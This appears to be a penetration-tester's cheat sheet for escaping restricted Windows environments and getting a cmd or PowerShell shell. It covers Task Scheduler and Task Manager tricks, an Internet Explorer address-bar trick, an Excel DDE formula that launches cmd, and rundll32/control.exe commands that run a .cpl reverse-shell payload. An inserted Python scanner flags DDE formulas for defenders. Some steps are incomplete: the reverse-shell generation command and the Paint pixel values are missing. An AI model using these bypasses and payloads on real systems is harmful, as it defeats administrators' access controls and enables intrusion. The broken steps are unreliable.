Windows utilities
Windows utilities that can be used to bypass restrictions
Last updated
We can create a new text file containing just the line cmd.exe, save it as file.bat, and double-click the file: a cmd window will open.
McAfee uncovered and documented the security flaws in a lengthy blog post. One simple issue is that the voice assistant can be triggered from the lock screen (assuming Cortana is enabled there, as it is on default settings) and a contextual Windows 10 menu brought up simply by typing while Cortana is listening to a query. In other words, typing while Cortana starts to listen to a query on a locked device brings up a Windows contextual menu.
An interesting weakness: some systems prevent access to cmd.exe, yet it can still be scheduled to run via Task Scheduler. This can be done either with the command-line scheduler (at.exe) or the GUI (taskschd.msc). A basic task can be created to run cmd.exe at a specific time (e.g. one minute in the future) or upon certain events, such as when a user logs on.
We can also use it to run PowerShell from the path:
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe
with a trigger that fires when the user logs out and logs back in.
Task Manager: CTRL+SHIFT+ESC -> File -> Run New Task
Right-click anywhere -> Print -> Find Printer -> browse to cmd.exe
Get a cmd shell in Internet Explorer:
Enter in address bar:
file://C:\Windows\System32\cmd.exe
Developer Tools: press F12 -> Performance tab -> click the third icon, "Importing Profile Session"
Get a cmd.exe shell using Excel:
Place this in a cell and press enter:
=cmd|' /k cmd.exe'!'A1'
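As an added example (not part of the original notes), a small Python scanner that recognises the DDE formula shape used above, =service|topic!item, and reports any cell carrying one. It parses the cmd formula into its service, topic and item, so a defender can flag spreadsheets or CSV imports that would launch a shell when opened in Excel. The sample CSV is constructed for the demonstration.

```python
import csv
import io
import re

# Shape of an Excel DDE formula: =service|topic!item. Excel treats a cell starting
# with =, +, - or @ as a formula, and the topic may be a quoted string carrying
# arbitrary arguments for the service (the formula above passes " /k cmd.exe" to cmd).
DDE_RE = re.compile(
    r"""^\s*[=+\-@]\s*
        (?P<service>[A-Za-z0-9_.\\:/-]+)\s*\|\s*   # DDE service, e.g. cmd
        (?P<topic>'[^']*'|[^!']+?)\s*!\s*          # DDE topic, quoted or bare
        (?P<item>'[^']*'|\S+)\s*$                  # DDE item, normally a cell ref
    """,
    re.VERBOSE,
)


def _unquote(s):
    # Strip one pair of single quotes, which Excel uses around topic and item.
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == "'" else s


def parse_dde(cell_text):
    """Return (service, topic, item) if the cell text is a DDE formula, else None."""
    m = DDE_RE.match(cell_text)
    if not m:
        return None
    return (m["service"].lower(), _unquote(m["topic"]), _unquote(m["item"]))


def scan_csv(text):
    """Return (row, col, service, topic, item) for every DDE formula in the CSV text."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for c, cell in enumerate(row, start=1):
            dde = parse_dde(cell)
            if dde:
                findings.append((r, c) + dde)
    return findings


# Constructed sample: an innocent-looking export whose third row carries the formula.
SAMPLE_CSV = (
    "name,amount\n"
    "alice,42\n"
    "\"=cmd|' /k cmd.exe'!'A1'\",7\n"
)

if __name__ == "__main__":
    for row, col, service, topic, item in scan_csv(SAMPLE_CSV):
        print(f"row {row} col {col}: DDE to {service!r}, topic {topic!r}, item {item!r}")
```

Ordinary formulas such as =SUM(A1:A3) are not reported, because they have no service|topic!item structure.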
Get a cmd.exe or PowerShell shell using Windows search:
Press the Windows key and type the search term. Note that admins frequently block cmd.exe and PowerShell but forget to block PowerShell ISE.
Try shortcuts:
Shift x 5 = Sticky Keys prompt
Alt + F4 = shutdown dialog
Win + R = Run
Ctrl + Shift + Esc = Task Manager
Ctrl + Alt + Delete = options menu (Task Manager, change password, etc.)
Generating a simple x64 reverse shell in a .cpl format:
Invoking the shellcode via control.exe:
control.exe .\FlashPlayerCPLApp.cpl
# or
rundll32.exe shell32.dll,Control_RunDLL file.cpl
# or
rundll32.exe shell32.dll,Control_RunDLLAsUser file.cpl
An unusual yet effective method of gaining a shell: produce a file that launches cmd.exe by drawing certain colours in Microsoft Paint. Because of the way BMP files are encoded, it is possible to dictate the ASCII bytes written into the file by carefully selecting the RGB colour of each pixel.
Open MSPaint.exe and set the canvas size to Width=6 and Height=1 pixels.
Zoom in to make the following steps easier.
Using the colour picker, set the pixel values to (from left to right):
Save it as a 24-bit Bitmap (*.bmp;*.dib).
Change its extension from .bmp to .bat and run it.